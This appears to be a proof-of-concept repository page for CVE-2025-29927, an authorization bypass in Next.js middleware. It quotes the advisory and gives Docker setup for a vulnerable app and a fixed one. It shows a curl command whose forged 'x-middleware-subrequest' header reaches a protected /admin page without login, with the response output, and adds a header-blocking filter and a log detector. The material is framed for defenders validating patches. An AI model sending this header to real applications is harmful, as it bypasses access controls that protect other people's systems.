
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Readme
# CVE-2025-29927

Reproduction and fix of the CVE-2025-29927 vulnerability.

```
git clone git@github.com:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
```

In `vulnerable/` there is a version of the application that is vulnerable to the attack. In `fixed/` there is a version of the application that is upgraded to the minimal version that fixes the vulnerability.

> ⚠️ Important: These examples are provided for defenders, researchers, and teams validating patching. Do **not** run these images on public or production networks. Only test on systems you own or where you have explicit written permission.

## Vulnerable version

Reproduction of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
```

### Run the exploit

Run this command; the unauthenticated request should be redirected to the login page:

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command; with the header set, the request should reach the admin page without authentication:

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...
```

## Fixed version

Fix of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
```

### Run the exploit

Run this command; the unauthenticated request should be redirected to the login page:

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command; on the fixed version, the request carrying the header should now also be redirected to the login page:

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```
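The advisory quoted at the top of this page recommends, where upgrading is not yet possible, keeping external requests that carry the `x-middleware-subrequest` header away from the Next.js application. The following is an added example, not code from the Bongni/CVE-2025-29927 repository: a guard that rejects such requests at a Node `http`-style front layer, plus a small detector that flags the same header in access logs. The header name and the `middleware:middleware:...` value come from the curl commands above; the log line format, the sample IPs and the `SAMPLE_LOG` entries are constructed for the example.

```javascript
// Added example (not part of the original repo). Mitigation filter for the
// advisory's workaround plus a log-based detector for bypass attempts.

const BLOCKED_HEADER = 'x-middleware-subrequest';

// True when the request carries the header under any capitalisation.
// HTTP header names are case-insensitive; Node lowercases them already,
// but a generic proxy or a raw header map may not.
function shouldReject(headers) {
  return Object.keys(headers).some(
    (name) => name.toLowerCase() === BLOCKED_HEADER,
  );
}

// Guard for a Node http server / custom Next.js server sitting in front of
// the app. Returns true when the request was passed on, false when it was
// answered with 403 (res is assumed to expose statusCode and end()).
function blockSubrequestHeader(req, res, next) {
  if (shouldReject(req.headers)) {
    res.statusCode = 403;
    res.end('forbidden');
    return false;
  }
  next();
  return true;
}

// Constructed access-log format for the example (not Next.js's own logging):
//   <client-ip> <method> <path> <status> hdr=<name>=<value>;<name>=<value>...
const SAMPLE_LOG = [
  '203.0.113.7 GET /admin 307 hdr=host=localhost:3000;user-agent=curl/8.5.0',
  '203.0.113.7 GET /admin 200 hdr=host=localhost:3000;' +
    'x-middleware-subrequest=middleware:middleware:middleware:middleware:middleware',
  '198.51.100.2 GET /login 200 hdr=host=localhost:3000',
];

// Return one record per log line in which an external client sent the
// header. A 200 on a protected path with this header is the signature of a
// successful bypass on an unpatched version.
function findBypassAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/^(\S+) (\S+) (\S+) (\d{3}) hdr=(.*)$/);
    if (!m) continue;
    const [, ip, method, path, status, hdrs] = m;
    const names = hdrs.split(';').map((h) => h.split('=')[0].trim().toLowerCase());
    if (names.includes(BLOCKED_HEADER)) {
      hits.push({ ip, method, path, status: Number(status) });
    }
  }
  return hits;
}
```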

## References

This repository is based on [l1uk/nextjs-middleware-exploit](https://github.com/l1uk/nextjs-middleware-exploit), but adapted for version 15.x of Next.js.
File Snapshot

```
[4.0K] /data/pocs/4924ef3ceb64230136277a76086f90f6c194e544
├── [4.0K] fixed
│   ├── [ 133] Dockerfile
│   ├── [ 523] middleware.js
│   ├── [ 281] package.json
│   ├── [4.0K] pages
│   │   ├── [  63] admin.js
│   │   └── [  63] login.js
│   └── [ 849] README.md
├── [1.0K] LICENSE
├── [2.5K] README.md
└── [4.0K] vulnerable
    ├── [ 133] Dockerfile
    ├── [ 523] middleware.js
    ├── [ 280] package.json
    ├── [4.0K] pages
    │   ├── [  63] admin.js
    │   └── [  63] login.js
    └── [ 923] README.md

5 directories, 14 files
```